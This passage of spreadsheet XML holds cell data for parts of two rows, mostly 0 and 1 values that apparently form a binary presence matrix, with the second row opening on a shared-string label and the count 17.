      <c r="ID49">
        <v>0</v>
      </c>
      <c r="IE49">
        <v>0</v>
      </c>
      <c r="IF49">
        <v>0</v>
      </c>
      <c r="IG49">
        <v>0</v>
      </c>
      <c r="IH49">
        <v>0</v>
      </c>
      <c r="II49">
        <v>0</v>
      </c>
      <c r="IJ49">
        <v>0</v>
      </c>
      <c r="IK49">
        <v>0</v>
      </c>
      <c r="IL49">
        <v>0</v>
      </c>
      <c r="IM49">
        <v>0</v>
      </c>
      <c r="IN49">
        <v>1</v>
      </c>
      <c r="IO49">
        <v>0</v>
      </c>
      <c r="IP49">
        <v>0</v>
      </c>
      <c r="IQ49">
        <v>1</v>
      </c>
      <c r="IR49">
        <v>0</v>
      </c>
      <c r="IS49">
        <v>0</v>
      </c>
      <c r="IT49">
        <v>0</v>
      </c>
      <c r="IU49">
        <v>1</v>
      </c>
      <c r="IV49">
        <v>0</v>
      </c>
      <c r="IW49">
        <v>0</v>
      </c>
      <c r="IX49">
        <v>0</v>
      </c>
      <c r="IY49">
        <v>0</v>
      </c>
      <c r="IZ49">
        <v>0</v>
      </c>
      <c r="JA49">
        <v>0</v>
      </c>
      <c r="JB49">
        <v>0</v>
      </c>
      <c r="JC49">
        <v>0</v>
      </c>
      <c r="JD49">
        <v>0</v>
      </c>
      <c r="JE49">
        <v>1</v>
      </c>
      <c r="JF49">
        <v>0</v>
      </c>
      <c r="JG49">
        <v>0</v>
      </c>
      <c r="JH49">
        <v>0</v>
      </c>
      <c r="JI49">
        <v>0</v>
      </c>
      <c r="JJ49">
        <v>0</v>
      </c>
      <c r="JK49">
        <v>0</v>
      </c>
      <c r="JL49">
        <v>0</v>
      </c>
      <c r="JM49">
        <v>1</v>
      </c>
      <c r="JN49">
        <v>0</v>
      </c>
      <c r="JO49">
        <v>0</v>
      </c>
      <c r="JP49">
        <v>0</v>
      </c>
      <c r="JQ49">
        <v>0</v>
      </c>
      <c r="JR49">
        <v>0</v>
      </c>
      <c r="JS49">
        <v>0</v>
      </c>
      <c r="JT49">
        <v>0</v>
      </c>
      <c r="JU49">
        <v>0</v>
      </c>
      <c r="JV49">
        <v>0</v>
      </c>
      <c r="JW49">
        <v>0</v>
      </c>
      <c r="JX49">
        <v>0</v>
      </c>
      <c r="JY49">
        <v>0</v>
      </c>
      <c r="JZ49">
        <v>0</v>
      </c>
      <c r="KA49">
        <v>0</v>
      </c>
      <c r="KB49">
        <v>0</v>
      </c>
      <c r="KC49">
        <v>1</v>
      </c>
      <c r="KD49">
        <v>1</v>
      </c>
      <c r="KE49">
        <v>1</v>
      </c>
      <c r="KF49">
        <v>1</v>
      </c>
      <c r="KG49">
        <v>1</v>
      </c>
      <c r="KH49">
        <v>1</v>
      </c>
      <c r="KI49">
        <v>0</v>
      </c>
      <c r="KJ49">
        <v>0</v>
      </c>
      <c r="KK49">
        <v>0</v>
      </c>
      <c r="KL49">
        <v>0</v>
      </c>
      <c r="KM49">
        <v>0</v>
      </c>
      <c r="KN49">
        <v>1</v>
      </c>
      <c r="KO49">
        <v>0</v>
      </c>
      <c r="KP49">
        <v>0</v>
      </c>
      <c r="KQ49">
        <v>0</v>
      </c>
      <c r="KR49">
        <v>0</v>
      </c>
      <c r="KS49">
        <v>0</v>
      </c>
      <c r="KT49">
        <v>0</v>
      </c>
      <c r="KU49">
        <v>0</v>
      </c>
      <c r="KV49">
        <v>0</v>
      </c>
      <c r="KW49">
        <v>0</v>
      </c>
      <c r="KX49">
        <v>0</v>
      </c>
      <c r="KY49">
        <v>0</v>
      </c>
      <c r="KZ49">
        <v>0</v>
      </c>
      <c r="LA49">
        <v>1</v>
      </c>
      <c r="LB49">
        <v>1</v>
      </c>
      <c r="LC49">
        <v>1</v>
      </c>
      <c r="LD49">
        <v>0</v>
      </c>
      <c r="LE49">
        <v>0</v>
      </c>
      <c r="LF49">
        <v>0</v>
      </c>
      <c r="LG49">
        <v>0</v>
      </c>
      <c r="LH49">
        <v>0</v>
      </c>
      <c r="LI49">
        <v>0</v>
      </c>
      <c r="LJ49">
        <v>1</v>
      </c>
      <c r="LK49">
        <v>1</v>
      </c>
      <c r="LL49">
        <v>1</v>
      </c>
      <c r="LM49">
        <v>0</v>
      </c>
      <c r="LN49">
        <v>0</v>
      </c>
      <c r="LO49">
        <v>1</v>
      </c>
      <c r="LP49">
        <v>0</v>
      </c>
      <c r="LQ49">
        <v>0</v>
      </c>
      <c r="LR49">
        <v>1</v>
      </c>
      <c r="LS49">
        <v>0</v>
      </c>
      <c r="LT49">
        <v>0</v>
      </c>
      <c r="LU49">
        <v>0</v>
      </c>
      <c r="LV49">
        <v>0</v>
      </c>
      <c r="LW49">
        <v>0</v>
      </c>
      <c r="LX49">
        <v>0</v>
      </c>
      <c r="LY49">
        <v>0</v>
      </c>
      <c r="LZ49">
        <v>0</v>
      </c>
      <c r="MA49">
        <v>0</v>
      </c>
      <c r="MB49">
        <v>0</v>
      </c>
      <c r="MC49">
        <v>0</v>
      </c>
      <c r="MD49">
        <v>0</v>
      </c>
      <c r="ME49">
        <v>0</v>
      </c>
      <c r="MF49">
        <v>1</v>
      </c>
      <c r="MG49">
        <v>0</v>
      </c>
      <c r="MH49">
        <v>0</v>
      </c>
      <c r="MI49">
        <v>0</v>
      </c>
      <c r="MJ49">
        <v>0</v>
      </c>
      <c r="MK49">
        <v>0</v>
      </c>
      <c r="ML49">
        <v>0</v>
      </c>
      <c r="MM49">
        <v>0</v>
      </c>
      <c r="MN49">
        <v>1</v>
      </c>
      <c r="MO49">
        <v>0</v>
      </c>
      <c r="MP49">
        <v>0</v>
      </c>
      <c r="MQ49">
        <v>0</v>
      </c>
      <c r="MR49">
        <v>1</v>
      </c>
      <c r="MS49">
        <v>0</v>
      </c>
      <c r="MT49">
        <v>0</v>
      </c>
      <c r="MU49">
        <v>0</v>
      </c>
      <c r="MV49">
        <v>0</v>
      </c>
      <c r="MW49">
        <v>0</v>
      </c>
      <c r="MX49">
        <v>0</v>
      </c>
      <c r="MY49">
        <v>0</v>
      </c>
      <c r="MZ49">
        <v>0</v>
      </c>
      <c r="NA49">
        <v>1</v>
      </c>
      <c r="NB49">
        <v>0</v>
      </c>
      <c r="NC49">
        <v>0</v>
      </c>
      <c r="ND49">
        <v>0</v>
      </c>
      <c r="NE49">
        <v>0</v>
      </c>
      <c r="NF49">
        <v>0</v>
      </c>
      <c r="NG49">
        <v>0</v>
      </c>
      <c r="NH49">
        <v>0</v>
      </c>
      <c r="NI49">
        <v>0</v>
      </c>
      <c r="NJ49">
        <v>1</v>
      </c>
      <c r="NK49">
        <v>0</v>
      </c>
      <c r="NL49">
        <v>0</v>
      </c>
      <c r="NM49">
        <v>0</v>
      </c>
      <c r="NN49">
        <v>0</v>
      </c>
      <c r="NO49">
        <v>0</v>
      </c>
      <c r="NP49">
        <v>0</v>
      </c>
      <c r="NQ49">
        <v>0</v>
      </c>
      <c r="NR49">
        <v>1</v>
      </c>
      <c r="NS49">
        <v>0</v>
      </c>
      <c r="NT49">
        <v>1</v>
      </c>
      <c r="NU49">
        <v>0</v>
      </c>
      <c r="NV49">
        <v>0</v>
      </c>
      <c r="NW49">
        <v>1</v>
      </c>
      <c r="NX49">
        <v>0</v>
      </c>
      <c r="NY49">
        <v>0</v>
      </c>
      <c r="NZ49">
        <v>0</v>
      </c>
      <c r="OA49">
        <v>0</v>
      </c>
      <c r="OB49">
        <v>0</v>
      </c>
      <c r="OC49">
        <v>0</v>
      </c>
      <c r="OD49">
        <v>1</v>
      </c>
      <c r="OE49">
        <v>0</v>
      </c>
      <c r="OF49">
        <v>0</v>
      </c>
      <c r="OG49">
        <v>0</v>
      </c>
      <c r="OH49">
        <v>0</v>
      </c>
      <c r="OI49">
        <v>0</v>
      </c>
      <c r="OJ49">
        <v>0</v>
      </c>
      <c r="OK49">
        <v>0</v>
      </c>
      <c r="OL49">
        <v>1</v>
      </c>
      <c r="OM49">
        <v>0</v>
      </c>
      <c r="ON49">
        <v>0</v>
      </c>
      <c r="OO49">
        <v>0</v>
      </c>
      <c r="OP49">
        <v>0</v>
      </c>
      <c r="OQ49">
        <v>0</v>
      </c>
      <c r="OR49">
        <v>0</v>
      </c>
      <c r="OS49">
        <v>0</v>
      </c>
      <c r="OT49">
        <v>0</v>
      </c>
      <c r="OU49">
        <v>0</v>
      </c>
      <c r="OV49">
        <v>0</v>
      </c>
      <c r="OW49">
        <v>0</v>
      </c>
      <c r="OX49">
        <v>0</v>
      </c>
      <c r="OY49">
        <v>0</v>
      </c>
      <c r="OZ49">
        <v>0</v>
      </c>
      <c r="PA49">
        <v>0</v>
      </c>
      <c r="PB49">
        <v>0</v>
      </c>
      <c r="PC49">
        <v>0</v>
      </c>
      <c r="PD49">
        <v>0</v>
      </c>
      <c r="PE49">
        <v>0</v>
      </c>
      <c r="PF49">
        <v>0</v>
      </c>
      <c r="PG49">
        <v>0</v>
      </c>
      <c r="PH49">
        <v>0</v>
      </c>
      <c r="PI49">
        <v>0</v>
      </c>
      <c r="PJ49">
        <v>0</v>
      </c>
      <c r="PK49">
        <v>0</v>
      </c>
      <c r="PL49">
        <v>0</v>
      </c>
      <c r="PM49">
        <v>0</v>
      </c>
      <c r="PN49">
        <v>0</v>
      </c>
      <c r="PO49">
        <v>0</v>
      </c>
      <c r="PP49">
        <v>0</v>
      </c>
      <c r="PQ49">
        <v>0</v>
      </c>
      <c r="PR49">
        <v>1</v>
      </c>
      <c r="PS49">
        <v>0</v>
      </c>
      <c r="PT49">
        <v>0</v>
      </c>
      <c r="PU49">
        <v>1</v>
      </c>
      <c r="PV49">
        <v>0</v>
      </c>
      <c r="PW49">
        <v>0</v>
      </c>
      <c r="PX49">
        <v>0</v>
      </c>
      <c r="PY49">
        <v>0</v>
      </c>
      <c r="PZ49">
        <v>0</v>
      </c>
      <c r="QA49">
        <v>0</v>
      </c>
      <c r="QB49">
        <v>0</v>
      </c>
      <c r="QC49">
        <v>0</v>
      </c>
      <c r="QD49">
        <v>1</v>
      </c>
      <c r="QE49">
        <v>0</v>
      </c>
      <c r="QF49">
        <v>0</v>
      </c>
      <c r="QG49">
        <v>0</v>
      </c>
      <c r="QH49">
        <v>0</v>
      </c>
      <c r="QI49">
        <v>0</v>
      </c>
      <c r="QJ49">
        <v>0</v>
      </c>
      <c r="QK49">
        <v>0</v>
      </c>
      <c r="QL49">
        <v>0</v>
      </c>
      <c r="QM49">
        <v>0</v>
      </c>
      <c r="QN49">
        <v>0</v>
      </c>
      <c r="QO49">
        <v>0</v>
      </c>
      <c r="QP49">
        <v>1</v>
      </c>
      <c r="QQ49">
        <v>0</v>
      </c>
      <c r="QR49">
        <v>0</v>
      </c>
      <c r="QS49">
        <v>0</v>
      </c>
      <c r="QT49">
        <v>0</v>
      </c>
      <c r="QU49">
        <v>0</v>
      </c>
      <c r="QV49">
        <v>1</v>
      </c>
      <c r="QW49">
        <v>0</v>
      </c>
      <c r="QX49">
        <v>0</v>
      </c>
      <c r="QY49">
        <v>0</v>
      </c>
      <c r="QZ49">
        <v>0</v>
      </c>
      <c r="RA49">
        <v>0</v>
      </c>
      <c r="RB49">
        <v>0</v>
      </c>
      <c r="RC49">
        <v>0</v>
      </c>
      <c r="RD49">
        <v>0</v>
      </c>
      <c r="RE49">
        <v>0</v>
      </c>
      <c r="RF49">
        <v>0</v>
      </c>
      <c r="RG49">
        <v>0</v>
      </c>
      <c r="RH49">
        <v>0</v>
      </c>
      <c r="RI49">
        <v>0</v>
      </c>
      <c r="RJ49">
        <v>0</v>
      </c>
      <c r="RK49">
        <v>0</v>
      </c>
      <c r="RL49">
        <v>0</v>
      </c>
      <c r="RM49">
        <v>0</v>
      </c>
      <c r="RN49">
        <v>0</v>
      </c>
      <c r="RO49">
        <v>0</v>
      </c>
      <c r="RP49">
        <v>0</v>
      </c>
      <c r="RQ49">
        <v>0</v>
      </c>
      <c r="RR49">
        <v>1</v>
      </c>
      <c r="RS49">
        <v>0</v>
      </c>
      <c r="RT49">
        <v>0</v>
      </c>
      <c r="RU49">
        <v>0</v>
      </c>
      <c r="RV49">
        <v>0</v>
      </c>
      <c r="RW49">
        <v>0</v>
      </c>
      <c r="RX49">
        <v>0</v>
      </c>
      <c r="RY49">
        <v>0</v>
      </c>
      <c r="RZ49">
        <v>0</v>
      </c>
      <c r="SA49">
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A50" s="6" t="s">
        <v>2976</v>
      </c>
      <c r="B50">
        <v>17</v>
      </c>
      <c r="C50">
        <v>0</v>
      </c>
      <c r="D50">
        <v>0</v>
      </c>
      <c r="E50">
        <v>0</v>
      </c>
      <c r="F50">
        <v>0</v>
      </c>
      <c r="G50">
        <v>0</v>
      </c>
      <c r="H50">
        <v>0</v>
      </c>
      <c r="I50">
        <v>0</v>
      </c>
      <c r="J50">
        <v>0</v>
      </c>
      <c r="K50">
        <v>0</v>
      </c>
      <c r="L50">
        <v>0</v>
      </c>
      <c r="M50">
        <v>0</v>
      </c>
      <c r="N50">
        <v>0</v>
      </c>
      <c r="O50">
        <v>0</v>
      </c>
      <c r="P50">
        <v>0</v>
      </c>
      <c r="Q50">
        <v>0</v>
      </c>
      <c r="R50">
        <v>0</v>
      </c>
      <c r="S50">
        <v>0</v>
      </c>
      <c r="T50">
        <v>0</v>
      </c>
      <c r="U50">
        <v>0</v>
      </c>
      <c r="V50">
        <v>0</v>
      </c>
      <c r="W50">
        <v>0</v>
      </c>
      <c r="X50">
        <v>0</v>
      </c>
      <c r="Y50">
        <v>0</v>
      </c>
      <c r="Z50">
        <v>0</v>
      </c>
      <c r="AA50">
        <v>0</v>
      </c>
      <c r="AB50">
        <v>0</v>
      </c>
      <c r="AC50">
        <v>0</v>
      </c>
      <c r="AD50">
        <v>0</v>
      </c>
      <c r="AE50">
        <v>0</v>
      </c>
      <c r="AF50">
        <v>0</v>
      </c>
      <c r="AG50">
        <v>0</v>
      </c>
      <c r="AH50">
        <v>0</v>
      </c>
      <c r="AI50">
        <v>0</v>
      </c>
      <c r="AJ50">
        <v>0</v>
      </c>
      <c r="AK50">
        <v>0</v>
      </c>
      <c r="AL50">
        <v>0</v>
      </c>
      <c r="AM50">
        <v>0</v>
      </c>
      <c r="AN50">
        <v>0</v>
      </c>
      <c r="AO50">
        <v>0</v>
      </c>
      <c r="AP50">
        <v>0</v>
      </c>
      <c r="AQ50">
        <v>0</v>
      </c>
      <c r="AR50">
        <v>0</v>
      </c>
      <c r="AS50">
        <v>0</v>
      </c>
      <c r="AT50">
        <v>0</v>
      </c>
      <c r="AU50">
        <v>0</v>
      </c>
      <c r="AV50">
        <v>0</v>
      </c>
      <c r="AW50">
        <v>0</v>
      </c>
      <c r="AX50">
        <v>0</v>
      </c>
      <c r="AY50">
        <v>1</v>
      </c>
      <c r="AZ50">
        <v>0</v>
      </c>
      <c r="BA50">
        <v>0</v>
      </c>
      <c r="BB50">
        <v>0</v>
      </c>
      <c r="BC50">
        <v>0</v>
      </c>
      <c r="BD50">
        <v>0</v>
      </c>
      <c r="BE50">
        <v>0</v>
      </c>
      <c r="BF50">
        <v>0</v>
      </c>
      <c r="BG50">
        <v>0</v>
      </c>
      <c r="BH50">
        <v>0</v>
      </c>
      <c r="BI50">
        <v>0</v>
      </c>
      <c r="BJ50">
        <v>0</v>
      </c>
      <c r="BK50">
        <v>0</v>
      </c>
      <c r="BL50">
        <v>0</v>
      </c>
      <c r="BM50">
        <v>0</v>
      </c>
      <c r="BN50">
        <v>0</v>
      </c>
      <c r="BO50">
        <v>0</v>
      </c>
      <c r="BP50">
        <v>0</v>
      </c>
      <c r="BQ50">
        <v>0</v>
      </c>
      <c r="BR50">
        <v>0</v>
      </c>
      <c r="BS50">
        <v>0</v>
      </c>
      <c r="BT50">
        <v>0</v>
      </c>
      <c r="BU50">
        <v>0</v>
      </c>
      <c r="BV50">
        <v>0</v>
      </c>
      <c r="BW50">
        <v>0</v>
      </c>
      <c r="BX50">
        <v>1</v>
      </c>
      <c r="BY50">
        <v>0</v>
      </c>
      <c r="BZ50">
        <v>1</v>
      </c>
      <c r="CA50">
        <v>0</v>
      </c>
      <c r="CB50">
        <v>0</v>
      </c>
      <c r="CC50">
        <v>0</v>
      </c>
      <c r="CD50">
        <v>0</v>
      </c>
      <c r="CE50">
        <v>1</v>
      </c>
      <c r="CF50">
        <v>0</v>
      </c>
      <c r="CG50">
        <v>0</v>
      </c>
      <c r="CH50">
        <v>0</v>
      </c>
      <c r="CI50">
        <v>0</v>
      </c>
      <c r="CJ50">
        <v>0</v>
      </c>
      <c r="CK50">
        <v>0</v>
      </c>
      <c r="CL50">
        <v>0</v>
      </c>
      <c r="CM50">
        <v>0</v>
      </c>
      <c r="CN50">
        <v>0</v>
      </c>
      <c r="CO50">
        <v>0</v>
      </c>
      <c r="CP50">
        <v>0</v>
      </c>
      <c r="CQ50">
        <v>0</v>
      </c>
      <c r="CR50">
        <v>0</v>
      </c>
      <c r="CS50">
        <v>0</v>
      </c>
      <c r="CT50">
        <v>0</v>
      </c>
      <c r="CU50">
        <v>0</v>
      </c>
      <c r="CV50">
        <v>0</v>
      </c>
      <c r="CW50">
        <v>0</v>
      </c>
      <c r="CX50">
        <v>0</v>
      </c>
      <c r="CY50">
        <v>0</v>
      </c>
      <c r="CZ50">
        <v>0</v>
      </c>
      <c r="DA50">
        <v>1</v>
      </c>
      <c r="DB50">
        <v>0</v>
      </c>
      <c r="DC50">
        <v>0</v>
      </c>
      <c r="DD50">
        <v>0</v>
      </c>
      <c r="DE50">
        <v>0</v>
      </c>
      <c r="DF50">
        <v>0</v>
      </c>
      <c r="DG50">
        <v>0</v>
      </c>
      <c r="DH50">
        <v>0</v>
      </c>
      <c r="DI50">
        <v>0</v>
      </c>
      <c r="DJ50">
        <v>1</v>
      </c>
      <c r="DK50">
        <v>0</v>
      </c>
      <c r="DL50">
        <v>0</v>
      </c>
      <c r="DM50">
        <v>0</v>
      </c>
      <c r="DN50">
        <v>0</v>
      </c>
      <c r="DO50">
        <v>0</v>
      </c>
      <c r="DP50">
        <v>0</v>
      </c>
      <c r="DQ50">
        <v>0</v>
      </c>
      <c r="DR50">
        <v>0</v>
      </c>
      <c r="DS50">
        <v>0</v>
      </c>
      <c r="DT50">
        <v>0</v>
      </c>
      <c r="DU50">
        <v>0</v>
      </c>
      <c r="DV50">
        <v>0</v>
      </c>
      <c r="DW50">
        <v>0</v>
      </c>
      <c r="DX50">
        <v>0</v>
      </c>
      <c r="DY50">
        <v>0</v>
      </c>
      <c r="DZ50">
        <v>0</v>
      </c>
      <c r="EA50">
        <v>0</v>
      </c>
      <c r="EB50">
        <v>0</v>
      </c>
      <c r="EC50">
        <v>0</v>
      </c>
      <c r="ED50">
        <v>0</v>
      </c>
      <c r="EE50">
        <v>0</v>
      </c>
      <c r="EF50">
        <v>0</v>
      </c>
      <c r="EG50">
        <v>0</v>
      </c>
      <c r="EH50">
        <v>0</v>
      </c>
      <c r="EI50">
        <v>0</v>
      </c>
      <c r="EJ50">
        <v>0</v>
      </c>
      <c r="EK50">
        <v>0</v>
      </c>
      <c r="EL50">
        <v>0</v>
      </c>
      <c r="EM50">
        <v>0</v>
      </c>
      <c r="EN50">
        <v>0</v>
      </c>
      <c r="EO50">
        <v>0</v>
      </c>
      <c r="EP50">
        <v>0</v>
      </c>
      <c r="EQ50">
        <v>0</v>
      </c>
      <c r="ER50">
        <v>0</v>
      </c>
      <c r="ES50">
        <v>0</v>
      </c>
      <c r="ET50">
        <v>0</v>
      </c>
      <c r="EU50">
        <v>0</v>
      </c>
      <c r="EV50">
        <v>0</v>
      </c>
      <c r="EW50">
        <v>0</v>
      </c>
      <c r="EX50">
        <v>0</v>
      </c>
      <c r="EY50">
        <v>0</v>
      </c>
      <c r="EZ50">
        <v>0</v>
      </c>
      <c r="FA50">
        <v>0</v>
      </c>
      <c r="FB50">
        <v>0</v>
      </c>
      <c r="FC50">
        <v>0</v>
      </c>
      <c r="FD50">
        <v>0</v>
      </c>
      <c r="FE50">
        <v>0</v>
      </c>
      <c r="FF50">
        <v>0</v>
      </c>
      <c r="FG50">
        <v>0</v>
      </c>
      <c r="FH50">
        <v>0</v>
      </c>
      <c r="FI50">
        <v>0</v>
      </c>
      <c r="FJ50">
        <v>0</v>
      </c>
      <c r="FK50">
        <v>0</v>
      </c>
      <c r="FL50">
        <v>0</v>
      </c>
      <c r="FM50">
        <v>0</v>
      </c>
      <c r="FN50">
        <v>0</v>
      </c>
      <c r="FO50">
        <v>0</v>
      </c>
      <c r="FP50">
        <v>0</v>
      </c>
      <c r="FQ50">
        <v>0</v>
      </c>
      <c r="FR50">
        <v>0</v>
      </c>
      <c r="FS50">
        <v>0</v>
      </c>
      <c r="FT50">
        <v>0</v>
      </c>
      <c r="FU50">
        <v>0</v>
      </c>
      <c r="FV50">
        <v>0</v>
      </c>
      <c r="FW50">
        <v>0</v>
      </c>
      <c r="FX50">
        <v>0</v>
      </c>
      <c r="FY50">
        <v>0</v>
      </c>
      <c r="FZ50">
        <v>0</v>
      </c>
      <c r="GA50">
        <v>0</v>
      </c>
      <c r="GB50">
        <v>0</v>
      </c>
      <c r="GC50">
        <v>0</v>
      </c>
      <c r="GD50">
        <v>0</v>
      </c>
      <c r="GE50">
        <v>0</v>
      </c>
      <c r="GF50">
        <v>0</v>
      </c>
      <c r="GG50">
        <v>0</v>
      </c>
      <c r="GH50">
        <v>1</v>
      </c>
      <c r="GI50">
        <v>0</v>
      </c>
      <c r="GJ50">
        <v>0</v>
      </c>
      <c r="GK50">
        <v>0</v>
      </c>
      <c r="GL50">
        <v>0</v>
      </c>
      <c r="GM50">
        <v>0</v>
      </c>
      <c r="GN50">
        <v>0</v>
      </c>
      <c r="GO50">
        <v>0</v>
      </c>
      <c r="GP50">
        <v>0</v>
      </c>
      <c r="GQ50">
        <v>0</v>
      </c>
      <c r="GR50">
        <v>0</v>
      </c>
      <c r="GS50">
        <v>0</v>
      </c>
      <c r="GT50">
        <v>0</v>
      </c>
      <c r="GU50">
        <v>0</v>
      </c>
      <c r="GV50">
        <v>0</v>
      </c>
      <c r="GW50">
        <v>0</v>
      </c>
      <c r="GX50">
        <v>1</v>
      </c>
      <c r="GY50">
        <v>1</v>
      </c>
      <c r="GZ50">
        <v>0</v>
      </c>
      <c r="HA50">
        <v>0</v>
      </c>
      <c r="HB50">
        <v>0</v>
      </c>
      <c r="HC50">
        <v>0</v>
      </c>
      <c r="HD50">
        <v>0</v>
      </c>
      <c r="HE50">
        <v>0</v>
      </c>
      <c r="HF50">
        <v>0</v>
      </c>
      <c r="HG50">
        <v>0</v>
      </c>
      <c r="HH50">
        <v>0</v>
      </c>
      <c r="HI50">
        <v>0</v>
      </c>
      <c r="HJ50">
        <v>0</v>
      </c>
      <c r="HK50">
        <v>0</v>
      </c>
      <c r="HL50">
        <v>0</v>
      </c>
      <c r="HM50">
        <v>0</v>
      </c>
      <c r="HN50">
        <v>0</v>
      </c>
      <c r="HO50">
        <v>0</v>
      </c>
      <c r="HP50">
        <v>0</v>
      </c>
      <c r="HQ50">
        <v>0</v>
      </c>
      <c r="HR50">
        <v>0</v>
      </c>
      <c r="HS50">
        <v>0</v>
      </c>
      <c r="HT50">
        <v>0</v>
      </c>
      <c r="HU50">
        <v>0</v>
      </c>
      <c r="HV50">
        <v>1</v>
      </c>
      <c r="HW50">
        <v>0</v>
      </c>
      <c r="HX50">
        <v>0</v>
      </c>
      <c r="HY50">
        <v>0</v>
      </c>
      <c r="HZ50">
        <v>1</v>
      </c>
      <c r="IA50">
        <v>0</v>
      </c>
      <c r="IB50">
        <v>0</v>
      </c>
      <c r="IC50">
        <v>0</v>
      </c>
      <c r="ID50">
        <v>0</v>
      </c>
      <c r="IE50">
        <v>0</v>
      </c>
      <c r="IF50">
        <v>0</v>
      </c>
      <c r="IG50">
        <v>0</v>
      </c>
      <c r="IH50">
        <v>0</v>
      </c>
      <c r="II50">
        <v>0</v>
      </c>
      <c r="IJ50">
        <v>0</v>
      </c>
      <c r="IK50">
        <v>0</v>
      </c>
      <c r="IL50">
        <v>0</v>
      </c>
      <c r="IM50">
        <v>0</v>
      </c>
      <c r="IN50">
        <v>0</v>
      </c>
      <c r="IO50">
        <v>0</v>
      </c>
      <c r="IP50">
        <v>0</v>
      </c>
      <c r="IQ50">
        <v>0</v>
      </c>
      <c r="IR50">
        <v>0</v>
      </c>
      <c r="IS50">
        <v>0</v>
      </c>
      <c r="IT50">
        <v>0</v>
      </c>
      <c r="IU50">
        <v>0</v>
      </c>
      <c r="IV50">
        <v>0</v>
      </c>
      <c r="IW50">
        <v>0</v>
      </c>
      <c r="IX50">
        <v>0</v>
      </c>
      <c r="IY50">
        <v>0</v>
      </c>
      <c r="IZ50">
        <v>0</v>
      </c>
      <c r="JA50">
        <v>0</v>
      </c>
      <c r="JB50">
        <v>0</v>
      </c>
      <c r="JC50">
        <v>0</v>
      </c>
      <c r="JD50">
        <v>0</v>
      </c>
      <c r="JE50">
        <v>0</v>
      </c>
      <c r="JF50">
        <v>0</v>
      </c>
      <c r="JG50">
        <v>0</v>
      </c>
      <c r="JH50">
        <v>0</v>
      </c>
      <c r="JI50">
        <v>0</v>
      </c>
      <c r="JJ50">
        <v>0</v>
      </c>
      <c r="JK50">
        <v>0</v>
      </c>
      <c r="JL50">
        <v>0</v>
      </c>
      <c r="JM50">
        <v>0</v>
      </c>
      <c r="JN50">
        <v>0</v>
      </c>
      <c r="JO50">
        <v>0</v>
      </c>
      <c r="JP50">
        <v>0</v>
      </c>
      <c r="JQ50">
        <v>0</v>
      </c>
      <c r="JR50">
        <v>0</v>
      </c>
      <c r="JS50">
        <v>0</v>
      </c>
      <c r="JT50">
        <v>0</v>
      </c>
      <c r="JU50">
        <v>0</v>
      </c>
      <c r="JV50">
        <v>0</v>
      </c>
      <c r="JW50">
        <v>0</v>
      </c>
      <c r="JX50">
        <v>0</v>
      </c>
      <c r="JY50">
        <v>0</v>
      </c>
      <c r="JZ50">
        <v>0</v>
      </c>
      <c r="KA50">
        <v>0</v>
      </c>
      <c r="KB50">
        <v>0</v>
      </c>
      <c r="KC50">
        <v>0</v>
      </c>
      <c r="KD50">
        <v>0</v>
      </c>
      <c r="KE50">
        <v>0</v>
      </c>
      <c r="KF50">
        <v>0</v>
      </c>
      <c r="KG50">
        <v>0</v>
      </c>
      <c r="KH50">
        <v>1</v>
      </c>
      <c r="KI50">
        <v>0</v>
      </c>
      <c r="KJ50">
        <v>0</v>
      </c>
      <c r="KK50">
        <v>0</v>
      </c>
      <c r="KL50">
        <v>0</v>
      </c>
      <c r="KM50">
        <v>0</v>
      </c>
      <c r="KN50">
        <v>0</v>
      </c>
      <c r="KO50">
        <v>0</v>
      </c>
      <c r="KP50">
        <v>0</v>
      </c>
      <c r="KQ50">
        <v>0</v>
      </c>
      <c r="KR50">
        <v>0</v>
      </c>
      <c r="KS50">
        <v>0</v>
      </c>
      <c r="KT50">
        <v>1</v>
      </c>
      <c r="KU50">
        <v>0</v>
      </c>
      <c r="KV50">
        <v>0</v>
      </c>
      <c r="KW50">
        <v>0</v>
      </c>
      <c r="KX50">
        <v>0</v>
      </c>
      <c r="KY50">
        <v>0</v>
      </c>
      <c r="KZ50">
        <v>0</v>
      </c>
      <c r="LA50">
        <v>0</v>
      </c>
      <c r="LB50">
        <v>0</v>
      </c>
      <c r="LC50">
        <v>0</v>
      </c>
      <c r="LD50">
        <v>0</v>
      </c>
      <c r="LE50">
        <v>0</v>
      </c>
      <c r="LF50">
        <v>0</v>
      </c>
      <c r="LG50">
        <v>0</v>
      </c>
      <c r="LH50">
        <v>0</v>
      </c>
      <c r="LI50">
        <v>0</v>
      </c>
      <c r="LJ50">
        <v>1</v>
      </c>
      <c r="LK50">
        <v>1</v>
      </c>
      <c r="LL50">
        <v>0</v>
      </c>
      <c r="LM50">
        <v>0</v>
      </c>
      <c r="LN50">
        <v>0</v>
      </c>
      <c r="LO50">
        <v>0</v>
      </c>
      <c r="LP50">
        <v>0</v>
      </c>
      <c r="LQ50">
        <v>0</v>
      </c>
      <c r="LR50">
        <v>0</v>
      </c>
      <c r="LS50">
        <v>0</v>
      </c>
      <c r="LT50">
        <v>0</v>
      </c>
      <c r="LU50">
        <v>0</v>
      </c>
      <c r="LV50">
        <v>0</v>
      </c>
      <c r="LW50">
        <v>0</v>
      </c>
      <c r="LX50">
        <v>0</v>
      </c>
      <c r="LY50">
        <v>0</v>
      </c>
      <c r="LZ50">
        <v>0</v>
      </c>
      <c r="MA50">
        <v>0</v>
      </c>
      <c r="MB50">
        <v>0</v>
      </c>
      <c r="MC50">
        <v>0</v>
      </c>
      <c r="MD50">
        <v>0</v>
      </c>
      <c r="ME50">
        <v>0</v>
      </c>
      <c r="MF50">
        <v>0</v>
      </c>
      <c r="MG50">
        <v>0</v>
      </c>
      <c r="MH50">
        <v>1</v>
      </c>
      <c r="MI50">
        <v>0</v>
      </c>
      <c r="MJ50">
        <v>0</v>
      </c>
      <c r="MK50">
        <v>0</v>
      </c>
      <c r="ML50">
        <v>0</v>
      </c>
      <c r="MM50">
        <v>0</v>
      </c>
      <c r="MN50">
        <v>0</v>
      </c>
      <c r="MO50">
        <v>0</v>
      </c>
      <c r="MP50">
        <v>0</v>
      </c>
      <c r="MQ50">
        <v>0</v>
      </c>
      <c r="MR50">
        <v>0</v>
      </c>
      <c r="MS50">
        <v>0</v>
      </c>
      <c r="MT50">
        <v>0</v>
      </c>
      <c r="MU50">
        <v>0</v>
      </c>
      <c r="MV50">
        <v>0</v>
      </c>
      <c r="MW50">
        <v>0</v>
      </c>
      <c r="MX50">
        <v>0</v>
      </c>
      <c r="MY50">
        <v>0</v>
      </c>
